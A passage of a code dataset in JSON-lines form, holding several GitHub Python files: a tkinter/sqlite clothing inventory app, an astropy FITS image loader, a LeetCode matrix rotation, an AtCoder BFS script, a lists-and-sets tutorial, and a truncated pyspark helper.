Marie\r\nMejia, Juan Paulo\r\nOrdanza, Virgielyn\r\nPanganiban, Trisha Mae\r\nSantos, Juan Francisco\r\n'''\r\n\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\nimport sqlite3\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom stats import *\r\n\r\nroot = Tk()\r\nroot.title(\"Inventory System\")\r\nroot.geometry(\"1200x600\")\r\n\r\nconn = sqlite3.connect('Records.db')\r\nc = conn.cursor()\r\n\r\n# frame for the search box and buttons\r\ntop_frame = tk.Frame(root)\r\ntop_frame.pack(fill=\"x\", padx=20, pady=20)\r\n\r\n# search box\r\nsearch_box = tk.Entry(top_frame, width=50)\r\nsearch_box.pack(side=\"left\", padx=10, fill=\"x\", expand=True)\r\n\r\n\r\n# add, edit, and delete buttons\r\n\r\n# add function\r\ndef add_product():\r\n # function to add a new product to the inventory\r\n\r\n def submit():\r\n # function to submit the new product details to the table\r\n\r\n product_id = entry_product_id.get()\r\n name = entry_name.get()\r\n stocks = entry_stocks.get()\r\n price = entry_price.get()\r\n avails = cmb_avail.get()\r\n\r\n # 0-XS, 1-S, 2-M, 3-L, 4-XL\r\n if (rd_grp.get() == 0):\r\n cl_size = \"XS\"\r\n elif (rd_grp.get() == 1):\r\n cl_size = \"S\"\r\n elif (rd_grp.get() == 2):\r\n cl_size = \"M\"\r\n elif (rd_grp.get() == 3):\r\n cl_size = \"L\"\r\n else:\r\n cl_size = \"XL\"\r\n\r\n cl_category = []\r\n cl_category.append(cb_male.cget(\"text\") if var_male.get() == 1 else 0)\r\n cl_category.append(cb_fem.cget(\"text\") if var_fem.get() == 1 else 0)\r\n cl_category.append(cb_uni.cget(\"text\") if var_uni.get() == 1 else 0)\r\n cl_category.append(cb_shirt.cget(\r\n \"text\") if var_shirt.get() == 1 else 0)\r\n cl_category.append(cb_pants.cget(\r\n \"text\") if var_pants.get() == 1 else 0)\r\n cl_category.append(cb_lsleeve.cget(\r\n \"text\") if var_lsleeve.get() == 1 else 0)\r\n\r\n cl_category = ', '.join(item for item in cl_category if item != 0)\r\n\r\n # pangcheck nung nassave na data\r\n data = {\"number\": product_id,\r\n \"name\": name,\r\n \"stock\": stocks,\r\n \"price\": price,\r\n \"availability\": avails,\r\n \"size:\": cl_size,\r\n \"category\": cl_category}\r\n\r\n print(\"Save data: \", data)\r\n val = product_id\r\n result = c.execute(\"\"\"SELECT PID\r\n FROM inventory\r\n WHERE PID = ?;\"\"\", (val,))\r\n ans = result.fetchall()\r\n print(type(ans))\r\n\r\n if len(ans) == 0:\r\n print('this a pass')\r\n else:\r\n print(\"Product ID is taken\")\r\n messagebox.showerror(\"Error\", \"Product ID already exists\")\r\n return\r\n c.execute(\"INSERT INTO Inventory VALUES (?, ?, ?, ?, ?, ?, ?)\",\r\n (product_id, name, avails, stocks, price, cl_size, cl_category))\r\n\r\n conn.commit()\r\n view()\r\n add_window.destroy()\r\n root.deiconify()\r\n\r\n root.withdraw()\r\n add_window = Toplevel(root)\r\n add_window.title(\"Inventory System\")\r\n add_window.geometry(\"900x400\")\r\n\r\n # tile\r\n title = tk.Label(add_window, text=\"ADD PRODUCT\",\r\n font=(\"Times New Roman\", 12))\r\n title.pack(pady=20, fill=\"x\")\r\n title.config(anchor=\"center\")\r\n\r\n # frame for the entry widgets\r\n add_frame = tk.Frame(add_window)\r\n add_frame.pack(fill=\"both\", expand=True, padx=2, pady=2)\r\n\r\n # column 1 = product_id\r\n label_product_id = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Product ID:\", pady=8)\r\n label_product_id.grid(row=0, column=0, sticky=\"w\")\r\n\r\n entry_product_id = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_product_id.grid(row=0, column=1, padx=22, sticky=\"w\")\r\n\r\n # column 2 = name\r\n label_name = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Product Name:\", pady=8)\r\n label_name.grid(row=1, column=0, sticky=\"w\")\r\n\r\n entry_name = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_name.grid(row=1, column=1, padx=22, sticky=\"w\")\r\n\r\n # Column 3 = Availability\r\n label_availability = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Fabric:\", pady=8)\r\n label_availability.grid(row=2, column=0, sticky=\"w\")\r\n\r\n current = tk.StringVar()\r\n cmb_avail = ttk.Combobox(add_frame, font=(\"Segoe UI\", 10),\r\n width=20, textvariable=current)\r\n cmb_avail['values'] = ('Silk', 'Cotton', 'Wool', 'Linen', 'Worsted')\r\n cmb_avail.current(0)\r\n cmb_avail.grid(row=2, column=1, padx=22, sticky=\"w\")\r\n\r\n # column 4 stocks\r\n label_stocks = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Stocks:\", pady=8)\r\n label_stocks.grid(row=3, column=0, sticky=\"w\")\r\n\r\n entry_stocks = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_stocks.grid(row=3, column=1, padx=22, sticky=\"w\")\r\n\r\n # column 5 = price\r\n label_price = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Price:\", pady=8)\r\n label_price.grid(row=4, column=0, sticky=\"w\")\r\n\r\n entry_price = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_price.grid(row=4, column=1, padx=22, sticky=\"w\")\r\n\r\n # column 6 = size\r\n label_packaging = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Size:\", pady=8)\r\n label_packaging.grid(row=5, column=0, sticky=\"w\")\r\n\r\n sizes = ['XS', 'S', 'M', 'L ', 'XL']\r\n rd_grp = IntVar()\r\n for index in range(len(sizes)):\r\n rd_size = Radiobutton(add_frame, font=(\r\n \"Segoe UI\", 11), text=sizes[index], variable=rd_grp, value=index)\r\n rd_size.grid(row=5, column=1 + index, sticky=\"w\")\r\n\r\n # column 7 = category\r\n label_category = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Category:\", pady=8)\r\n label_category.grid(row=6, column=0, sticky=\"w\")\r\n\r\n var_male = IntVar()\r\n cb_male = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Male\", variable=var_male, onvalue=1, offvalue=0)\r\n cb_male.grid(row=6, column=1, padx=2, sticky=\"w\")\r\n\r\n var_fem = IntVar()\r\n cb_fem = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Female\", variable=var_fem, onvalue=1, offvalue=0)\r\n cb_fem.grid(row=6, column=2, sticky=\"w\")\r\n\r\n var_uni = IntVar()\r\n cb_uni = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Unisex\", variable=var_uni, onvalue=1, offvalue=0)\r\n cb_uni.grid(row=6, column=3, sticky=\"w\")\r\n\r\n var_shirt = IntVar()\r\n cb_shirt = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Shirt\", variable=var_shirt, onvalue=1, offvalue=0)\r\n cb_shirt.grid(row=7, column=1, sticky=\"w\")\r\n\r\n var_pants = IntVar()\r\n cb_pants = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Pants\", variable=var_pants, onvalue=1, offvalue=0)\r\n cb_pants.grid(row=7, column=2, sticky=\"w\")\r\n\r\n var_lsleeve = IntVar()\r\n cb_lsleeve = tk.Checkbutton(add_frame, font=(\"Segoe UI\", 10), text=\"Long Sleeved\", variable=var_lsleeve, onvalue=1,\r\n offvalue=0)\r\n cb_lsleeve.grid(row=7, column=3, sticky=\"w\")\r\n\r\n # Add, Back, and close buttons\r\n\r\n # frame for the Add button\r\n button_frame = tk.Frame(add_frame)\r\n button_frame.grid(row=1, column=2, padx=25, pady=2)\r\n\r\n add_button = tk.Button(button_frame, text=\" Add \", font=(\"Segoe UI\", 10),\r\n width=10, bg=\"white\", command=submit)\r\n add_button.pack(side=\"left\", pady=2)\r\n\r\n # frame for back button\r\n def back():\r\n add_window.destroy()\r\n root.deiconify()\r\n\r\n button_frame = tk.Frame(add_frame)\r\n button_frame.grid(row=2, column=2, padx=10, pady=2)\r\n\r\n back_button = tk.Button(button_frame, text=\" Back \", font=(\"Segoe UI\", 10),\r\n width=10, bg=\"white\", command=back)\r\n back_button.pack(side=\"bottom\", pady=2)\r\n\r\n # frame for Close button\r\n button_frame = tk.Frame(add_frame)\r\n button_frame.grid(row=3, column=2, padx=50, pady=2)\r\n\r\n close_button = tk.Button(button_frame, text=\" Close \", font=(\"Segoe UI\", 10),\r\n width=10, bg=\"white\", command=root.quit)\r\n close_button.pack(side=\"right\", pady=2)\r\n\r\n\r\nadd_button = tk.Button(top_frame, text=\"Add\", font=(\r\n \"Segoe UI\", 10), width=10, bg=\"white\", command=add_product)\r\nadd_button.pack(side=\"left\", padx=10)\r\n\r\n\r\n# Edit function\r\ndef edit_product():\r\n # function to edit the details of an existing product in the inventory\r\n selected_item = tbl_view.selection()\r\n\r\n if selected_item:\r\n values = tbl_view.item(selected_item[0], \"values\")\r\n print(f\"Selected values: {values}\")\r\n else:\r\n print(\"No item selected\")\r\n messagebox.showerror(\"Error\", \"Please select a product to edit\")\r\n return\r\n\r\n def submit():\r\n # function to submit the updated product details to the table\r\n\r\n product_id = entry_product_id.get()\r\n name = entry_name.get()\r\n stocks = entry_stocks.get()\r\n avails = entry_price.get()\r\n price = cmb_avail.get()\r\n\r\n # 0-XS, 1-S, 2-M, 3-L, 4-XL\r\n if (rd_grp.get() == 0):\r\n cl_size = \"XS\"\r\n elif (rd_grp.get() == 1):\r\n cl_size = \"S\"\r\n elif (rd_grp.get() == 2):\r\n cl_size = \"M\"\r\n elif (rd_grp.get() == 3):\r\n cl_size = \"L\"\r\n else:\r\n cl_size = \"XL\"\r\n\r\n cl_category = []\r\n cl_category.append(cb_male.cget(\"text\") if var_male.get() == 1 else 0)\r\n cl_category.append(cb_fem.cget(\"text\") if var_fem.get() == 1 else 0)\r\n cl_category.append(cb_uni.cget(\"text\") if var_uni.get() == 1 else 0)\r\n cl_category.append(cb_shirt.cget(\r\n \"text\") if var_shirt.get() == 1 else 0)\r\n cl_category.append(cb_pants.cget(\r\n \"text\") if var_pants.get() == 1 else 0)\r\n cl_category.append(cb_lsleeve.cget(\r\n \"text\") if var_lsleeve.get() == 1 else 0)\r\n\r\n cl_category = ', '.join(item for item in cl_category if item != 0)\r\n\r\n # pangcheck nung inedit na data\r\n data = {\"number\": product_id,\r\n \"name\": name,\r\n \"fabric\": price,\r\n \"stock\": stocks,\r\n \"price\": avails,\r\n \"size:\": cl_size,\r\n \"category\": cl_category}\r\n\r\n print(\"Edit data: \", data)\r\n\r\n selected = tbl_view.focus()\r\n selected_data = tbl_view.item(selected)[\"values\"]\r\n c.execute('''UPDATE Inventory SET\r\n PID = ?,\r\n name = ?,\r\n avail = ?,\r\n stocks = ?,\r\n price = ?,\r\n size = ?,\r\n category = ?\r\n WHERE PID = ? AND name = ?\r\n ''', (product_id, name, price, stocks, avails, cl_size, cl_category, selected_data[0], selected_data[1]))\r\n conn.commit()\r\n view()\r\n edit_window.destroy()\r\n root.deiconify()\r\n\r\n root.withdraw()\r\n edit_window = tk.Toplevel(root)\r\n edit_window.title(\"Inventory System\")\r\n edit_window.geometry(\"900x400\")\r\n\r\n # tile\r\n title = tk.Label(edit_window, text=\"EDIT PRODUCT\",\r\n font=(\"Times New Roman\", 12))\r\n title.pack(pady=20, fill=\"x\")\r\n title.config(anchor=\"center\")\r\n\r\n # frame for the entry widgets\r\n add_frame = tk.Frame(edit_window)\r\n add_frame.pack(fill=\"both\", expand=True, padx=2, pady=2)\r\n\r\n # column 1 = product_id\r\n label_product_id = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Product ID:\", pady=8)\r\n label_product_id.grid(row=0, column=0, sticky=\"w\")\r\n\r\n entry_product_id = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_product_id.grid(row=0, column=1, padx=22, sticky=\"w\")\r\n entry_product_id.insert(0, tbl_view.item(selected_item)[\"values\"][0])\r\n\r\n # column 2 = name\r\n label_name = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Product Name:\", pady=8)\r\n label_name.grid(row=1, column=0, sticky=\"w\")\r\n\r\n entry_name = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_name.grid(row=1, column=1, padx=22, sticky=\"w\")\r\n entry_name.insert(0, tbl_view.item(selected_item)[\"values\"][1])\r\n\r\n # Column 3 = Availability\r\n label_availability = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Fabric:\", pady=8)\r\n label_availability.grid(row=2, column=0, sticky=\"w\")\r\n\r\n current = tk.StringVar()\r\n cmb_avail = ttk.Combobox(add_frame, font=(\"Segoe UI\", 10),\r\n width=20)\r\n cmb_avail['values'] = ('Silk', 'Cotton', 'Linen', 'Wool', 'Worsted')\r\n cmb_avail.grid(row=2, column=1, padx=22, sticky=\"w\")\r\n cmb_avail.set(tbl_view.item(selected_item)[\"values\"][2])\r\n\r\n # column 4 stocks\r\n label_stocks = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Stocks:\", pady=8)\r\n label_stocks.grid(row=3, column=0, sticky=\"w\")\r\n\r\n entry_stocks = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_stocks.grid(row=3, column=1, padx=22, sticky=\"w\")\r\n entry_stocks.insert(0, tbl_view.item(selected_item)[\"values\"][3])\r\n\r\n # column 5 = price\r\n label_price = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Price:\", pady=8)\r\n label_price.grid(row=4, column=0, sticky=\"w\")\r\n\r\n entry_price = tk.Entry(add_frame, font=(\"Segoe UI\", 11))\r\n entry_price.grid(row=4, column=1, padx=22, sticky=\"w\")\r\n entry_price.insert(0, tbl_view.item(selected_item)[\"values\"][4])\r\n\r\n # column 6 = size\r\n label_packaging = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Size:\", pady=8)\r\n label_packaging.grid(row=5, column=0, sticky=\"w\")\r\n\r\n sizes = ['XS', 'S', 'M', 'L ', 'XL']\r\n rd_grp = IntVar()\r\n for index in range(len(sizes)):\r\n rd_size = Radiobutton(add_frame, font=(\r\n \"Segoe UI\", 11), text=sizes[index], variable=rd_grp, value=index)\r\n rd_size.grid(row=5, column=1 + index, sticky=\"w\")\r\n # rd_grp.set(tbl_view.item(selected_item)[\"values\"][5])\r\n\r\n # column 7 = category\r\n label_category = tk.Label(add_frame, font=(\r\n \"Segoe UI\", 11), text=\"Category:\", pady=8)\r\n label_category.grid(row=6, column=0, sticky=\"w\")\r\n\r\n var_male = IntVar()\r\n cb_male = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Male\", variable=var_male, onvalue=1, offvalue=0)\r\n cb_male.grid(row=6, column=1, padx=2, sticky=\"w\")\r\n # var_male.set(tbl_view.item(selected_item)[\"values\"][6])\r\n\r\n var_fem = IntVar()\r\n cb_fem = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Female\", variable=var_fem, onvalue=1, offvalue=0)\r\n cb_fem.grid(row=6, column=2, sticky=\"w\")\r\n # var_fem.set(tbl_view.item(selected_item)[\"values\"][6])\r\n\r\n var_uni = IntVar()\r\n cb_uni = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Unisex\", variable=var_uni, onvalue=1, offvalue=0)\r\n cb_uni.grid(row=6, column=3, sticky=\"w\")\r\n # var_uni.set(tbl_view.item(selected_item)[\"values\"][6])\r\n\r\n var_shirt = IntVar()\r\n cb_shirt = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Shirt\", variable=var_shirt, onvalue=1, offvalue=0)\r\n cb_shirt.grid(row=7, column=1, sticky=\"w\")\r\n # var_shirt.set(tbl_view.item(selected_item)[\"values\"][6])\r\n\r\n var_pants = IntVar()\r\n cb_pants = tk.Checkbutton(add_frame, font=(\r\n \"Segoe UI\", 10), text=\"Pants\", variable=var_pants, onvalue=1, offvalue=0)\r\n cb_pants.grid(row=7, column=2, sticky=\"w\")\r\n # var_pants.set(tbl_view.item(selected_item)[\"values\"][6])\r\n\r\n var_lsleeve = IntVar()\r\n cb_lsleeve = tk.Checkbutton(add_frame, font=(\"Segoe UI\", 10), text=\"Long Sleeved\", variable=var_lsleeve, onvalue=1,\r\n offvalue=0)\r\n cb_lsleeve.grid(row=7, column=3, sticky=\"w\")\r\n # var_lsleeve.set(tbl_view.item(selected_item)[\"values\"][6])\r\n\r\n # Save, Back, and close buttons\r\n\r\n # frame for the Add button\r\n button_frame = tk.Frame(add_frame)\r\n button_frame.grid(row=1, column=2, padx=50, pady=2)\r\n\r\n save_button = tk.Button(button_frame, text=\" Save \", font=(\r\n \"Segoe UI\", 10), width=10, bg=\"white\", command=submit)\r\n save_button.pack(side=\"left\", pady=2)\r\n\r\n # frame for back button\r\n def back():\r\n edit_window.destroy()\r\n root.deiconify()\r\n\r\n button_frame = tk.Frame(add_frame)\r\n button_frame.grid(row=2, column=2, padx=10, pady=2)\r\n\r\n back_button = tk.Button(button_frame, text=\" Back \", font=(\"Segoe UI\", 10),\r\n width=10, bg=\"white\", command=back)\r\n back_button.pack(side=\"bottom\", pady=2)\r\n\r\n # frame for Close button\r\n button_frame = tk.Frame(add_frame)\r\n button_frame.grid(row=3, column=2, padx=50, pady=2)\r\n\r\n close_button = tk.Button(button_frame, text=\" Close \", font=(\"Segoe UI\", 10),\r\n width=10, bg=\"white\", command=root.quit)\r\n close_button.pack(side=\"right\", pady=2)\r\n\r\n\r\n# call the function to open the edit window\r\nedit_button = tk.Button(top_frame, text=\"Edit\", font=(\r\n \"Segoe UI\", 10), width=10, bg=\"white\", command=edit_product)\r\nedit_button.pack(side=\"left\", padx=10)\r\n\r\n\r\n# delete function\r\ndef delete_product():\r\n selected = tbl_view.focus()\r\n selected_data = tbl_view.item(selected)[\"values\"]\r\n\r\n print(\"Deleted item data: \", selected_data)\r\n selected_item = tbl_view.selection()\r\n if selected_item:\r\n result = messagebox.askyesno(\r\n \"Inventory System\", \"Are you sure you want to delete the selected item?\")\r\n if result:\r\n tbl_view.delete(selected_item)\r\n else:\r\n messagebox.showerror(\"Inventory System\",\r\n \"Please select an item to delete.\")\r\n query = \"DELETE FROM Inventory WHERE PID = ? AND name = ?\"\r\n c.execute(query, (selected_data[0], selected_data[1]))\r\n conn.commit()\r\n\r\n\r\ndelete_button = tk.Button(top_frame, text=\"Delete\", font=(\r\n \"Segoe UI\", 10), width=10, bg=\"white\", command=delete_product)\r\ndelete_button.pack(side=\"left\", padx=10)\r\n\r\n\r\ndef search():\r\n # get entry from search box then hanapin yung entry sa database\r\n searchID = search_box.get()\r\n\r\n if (searchID == \"\"):\r\n messagebox.showerror(\"Error\", \"Search Field is empty\")\r\n else:\r\n # Get a certain value from the TreeView\r\n\r\n target_item = None\r\n '''for item in tbl_view.get_children():\r\n val = tbl_view.item(item, \"val\")\r\n if val[0] == searchID:\r\n target_item = item\r\n break\r\n if target_item:\r\n val = tbl_view.item(target_item, \"values\")\r\n print(f\"Values for item {target_item}: {val}\")\r\n else:\r\n print(\"Target item not found\")'''\r\n\r\n for item in tbl_view.get_children():\r\n tbl_view.delete(item)\r\n\r\n c.execute(\"SELECT * FROM Inventory WHERE PID LIKE ?\", (f'%{searchID}%',))\r\n searchable_data = c.fetchall()\r\n tbl_view.insert('', tk.END, values=searchable_data[0])\r\n\r\n\r\n# search button\r\nsearch_button = tk.Button(top_frame, text=\"Search\", font=(\r\n \"Segoe UI\", 10), width=10, bg=\"white\", command=search)\r\nsearch_button.pack(side=\"left\", padx=10)\r\n\r\n# frame for records\r\nlist_frame = tk.Frame(root)\r\nlist_frame.pack(fill=\"both\", expand=True, padx=20, pady=20)\r\n\r\n# Table for records\r\ntbl_column = ('prodID', 'prodName', 'prodAvail', 'prodStocks',\r\n 'prodPrice', 'prodSize', 'prodCat')\r\ntbl_view = ttk.Treeview(list_frame, columns=tbl_column, show='headings')\r\n\r\ntbl_view.column(\"prodID\", anchor=CENTER, stretch=NO, width=200)\r\ntbl_view.heading(\"prodID\", text=\"Product ID\")\r\n\r\ntbl_view.column(\"prodName\", anchor=CENTER, stretch=NO, width=250)\r\ntbl_view.heading(\"prodName\", text=\"Product Name\")\r\n\r\ntbl_view.column(\"prodAvail\", anchor=CENTER, stretch=NO, width=150)\r\ntbl_view.heading(\"prodAvail\", text=\"Fabric\")\r\n\r\ntbl_view.column(\"prodStocks\", anchor=CENTER, stretch=NO, width=150)\r\ntbl_view.heading(\"prodStocks\", text=\"Stocks\")\r\n\r\ntbl_view.column(\"prodPrice\", anchor=CENTER, stretch=NO, width=200)\r\ntbl_view.heading(\"prodPrice\", text=\"Price\")\r\n\r\ntbl_view.column(\"prodSize\", anchor=CENTER, stretch=NO, width=150)\r\ntbl_view.heading(\"prodSize\", text=\"Size\")\r\n\r\ntbl_view.column(\"prodCat\", anchor=CENTER, stretch=NO, width=350)\r\ntbl_view.heading(\"prodCat\", text=\"Category\")\r\n\r\n\r\ndef view():\r\n # Writes the records to the GUI\r\n records = c.execute(\"SELECT * FROM Inventory\")\r\n\r\n for item in tbl_view.get_children():\r\n tbl_view.delete(item)\r\n\r\n for record in records:\r\n tbl_view.insert('', tk.END, values=record)\r\n\r\n search_box.insert(0, \"\")\r\n\r\n\r\nview()\r\ntbl_view.pack(fill=\"both\", expand=True)\r\n\r\n# scrollbar\r\nsbar = ttk.Scrollbar(list_frame, orient=tk.HORIZONTAL, command=tbl_view.xview)\r\ntbl_view.configure(xscroll=sbar.set)\r\nsbar.pack(fill=\"both\")\r\n\r\n# frame for the View Graph and Close buttons\r\nbottom_frame = tk.Frame(root)\r\nbottom_frame.pack(fill=\"x\", padx=20, pady=20)\r\n\r\n\r\n# Statistics Function\r\ndef graph_data():\r\n # Can add more graphs but idk what else to graph honestly\r\n stats_window = tk.Toplevel(root)\r\n stats_window.title(\"Inventory System Statistics\")\r\n stats_window.geometry(\"1200x600\")\r\n\r\n table_data = c.execute(\"SELECT * FROM Inventory\").fetchall()\r\n\r\n table_dict = {\r\n \"name\": [],\r\n \"avail\": [],\r\n \"stocks\": [],\r\n \"price\": [],\r\n \"size\": [],\r\n \"category\": [],\r\n }\r\n\r\n for index, element in enumerate(table_data):\r\n table_dict['name'].append(element[1])\r\n table_dict['avail'].append(element[2])\r\n table_dict['stocks'].append(element[3])\r\n table_dict['price'].append(element[4])\r\n table_dict['size'].append(element[5])\r\n table_dict['category'].append(element[6])\r\n \r\n df = pd.DataFrame(table_dict)\r\n print(df)\r\n\r\n labels = [i for i in df['name']]\r\n pie_chart = df.plot.pie(title=\"Stocks\",y='stocks',\r\n figsize=(6,5), labels=labels).get_figure();\r\n \r\n plot1 = FigureCanvasTkAgg(pie_chart, stats_window)\r\n plot1.get_tk_widget().grid(row=2,column=1,padx=30,pady=30)\r\n # print(df)\r\n ndf = df.pivot_table(columns='name', values='price')\r\n bar_chart = ndf.plot.bar(title=\"Prices\",\r\n figsize=(5,5)).get_figure();\r\n plot2 = FigureCanvasTkAgg(bar_chart, stats_window)\r\n plot2.get_tk_widget().grid(row=2,column=2,padx=30,pady=30)\r\n\r\n\r\n# buttons\r\nview_graph_button = tk.Button(bottom_frame, text=\"View Statistics\", font=(\r\n \"Segoe UI\", 10), width=15, bg=\"white\", command=graph_data)\r\nview_graph_button.pack(side=\"left\", padx=10)\r\n\r\nclose_button = tk.Button(bottom_frame, text=\"Close\", font=(\r\n \"Segoe UI\", 10), width=10, bg=\"white\", command=root.quit)\r\nclose_button.pack(side=\"left\", padx=10)\r\n\r\nbtnView = tk.Button(bottom_frame, text=\"View Table\", font=(\r\n \"Segoe UI\", 10), width=15, bg=\"white\", command=view)\r\nbtnView.pack(side=\"left\", padx=10)\r\n\r\nroot.mainloop()\r\nconn.close()","repo_name":"meowcrobots/InventorySystem","sub_path":"InventorySystem.py","file_name":"InventorySystem.py","file_ext":"py","file_size_in_byte":23037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5090621229","text":"\"\"\"\nLoad image code.\n\"\"\"\n# pyright: reportMissingTypeStubs=true\nfrom __future__ import annotations\n\nfrom typing import Any, Tuple, Union\n\nimport astropy\nimport astropy.coordinates as coords\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.io.fits import Header, PrimaryHDU\nfrom astropy.time import Time\n\nfrom .image import FlowsImage\nfrom .instruments import INSTRUMENTS, verify_coordinates\nfrom .utilities import create_logger\n\nlogger = create_logger()\n\nastropy.__version__\n\n\ndef load_image(filename: str, target_coord: Union[coords.SkyCoord, Tuple[float, float]] = None):\n \"\"\"\n Load FITS image using FlowsImage class and Instrument Classes.\n\n Parameters:\n filename (str): Path to FITS file to be loaded.\n target_coord (:class:`astropy.coordinates.SkyCoord`): Coordinates of target.\n Only used for HAWKI images to determine which image extension to load,\n for all other images it is ignored.\n\n Returns:\n FlowsImage: instance of FlowsImage with values populated based on instrument.\n\n \"\"\"\n ext = 0 # Default extension is 0, individual instruments may override this.\n # Read fits image, Structural Pattern Match to specific instrument.\n with fits.open(filename, mode='readonly') as hdul:\n hdu: PrimaryHDU = hdul[ext]\n hdr: Header = hdu.header\n origin = str(hdr.get('ORIGIN', ''))\n telescope = str(hdr.get('TELESCOP', ''))\n instrument = str(hdr.get('INSTRUME', ''))\n\n for inst_name, inst_cls in INSTRUMENTS:\n if inst_cls.identifier(telescope, origin, instrument, hdr):\n logger.info(f\"Image is using instrument {inst_name}\")\n target_coord = verify_coordinates(target_coord)\n ext = inst_cls.get_ext(hdul, target_coord)\n mask = inst_cls.get_mask(hdul)\n # Default = None is to only mask all non-finite values, override here is additive.\n\n image = FlowsImage(image=np.asarray(hdu.data, dtype='float64'),\n header=hdr, mask=mask)\n current_instrument = inst_cls(image)\n clean_image = current_instrument.process_image()\n if target_coord is not None:\n clean_image.obstime = correct_barycentric(clean_image.obstime, target_coord)\n return clean_image\n\n raise RuntimeError(f\"Could not determine origin of image: {filename}\")\n\ndef correct_barycentric(obstime: Time, target_coord: coords.SkyCoord) -> Time:\n \"\"\"\n BARYCENTRIC CORRECTION OF TIME\n\n Parameters:\n obstime (astropy.time.Time): Midpoint observed image time.\n target_coord (astropy.coords.SkyCoord): Coordinates of target in image.\n\n Returns:\n obstime (astropy.time.Time): Time corrected to barycenter with jpl ephemeris.\n \"\"\"\n ltt_bary = obstime.light_travel_time(target_coord, ephemeris='jpl')\n return obstime.tdb + ltt_bary\n","repo_name":"SNflows/flows","sub_path":"flows/load_image.py","file_name":"load_image.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"70027531610","text":"class Solution:\n def rotate(self, m: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n m.reverse()\n #transposing\n for i in range(len(m)):\n for j in range(i):\n m[i][j], m[j][i] = m[j][i], m[i][j]\n","repo_name":"chandansgowda/leetcode-python","sub_path":"001-500/048.py","file_name":"048.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7457337118","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nH, W = map(int, input().split())\n\nm = [[0 for _ in range(W)] for _ in range(H)]\nroot = []\nfor i in range(H):\n # m.append(list(map(lambda x: 0 if x==\"#\" else 1, input())))\n for j, c in enumerate(input()):\n if c == \"#\":\n m[i][j] = 1\n root.append((i, j))\n\n# print(m)\n# print(root)\n\nqueue = deque(root)\ndef bfs():\n new_queue = deque([])\n while queue:\n p = queue.popleft()\n for i, j in ([-1, 0], [1, 0], [0, 1], [0, -1]):\n next_p = [p[0] + i, p[1] + j]\n if (0 <= next_p[0] < H) and (0 <= next_p[1] < W):\n if not m[next_p[0]][next_p[1]]:\n m[next_p[0]][next_p[1]] = 1\n new_queue.append(next_p)\n return new_queue\n\nans = 0\nif len(root) != H*W:\n while queue:\n # print(queue)\n # print(m)\n queue = bfs()\n ans += 1\n ans -= 1\n\nprint(ans)\n","repo_name":"naru380/AtCoder","sub_path":"ARC/37/B/tle.py","file_name":"tle.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71947559127","text":"my_variable = \"hello\"\ngrades = [77, 80, 90] #ordered (in order of creation) and mutable\ntuple_grades = (77, 80, 90) #immutable\nset_grades = {77, 80, 90, 100, 100} #unique and unordered\n\n#This is how you mutate a tuple similar to Immutable.js\n# tuple_grades = tuple_grades + (100,)\n# print(tuple_grades)\n\n# print(grades[0])\n\n\n##Set Operations\n\nset_one = {1, 2, 3, 4, 5}\nset_two = {1, 3, 7, 5, 11}\n\n# print(set_one.intersection(set_two))\n# print(set_one.union(set_two))\nprint({1, 2, 3, 4}.difference({1, 2}))","repo_name":"hscottharrison/udemy-python","sub_path":"list_tuples_sets.py","file_name":"list_tuples_sets.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9099923666","text":"from pyspark.ml.wrapper import JavaParams\n\n@staticmethod\ndef _mml_from_java(java_stage):\n \"\"\"\n Given a Java object, create and return a Python wrapper of it.\n Used for ML persistence.\n\n Meta-algorithms such as Pipeline should override this method as a classmethod.\n \"\"\"\n def 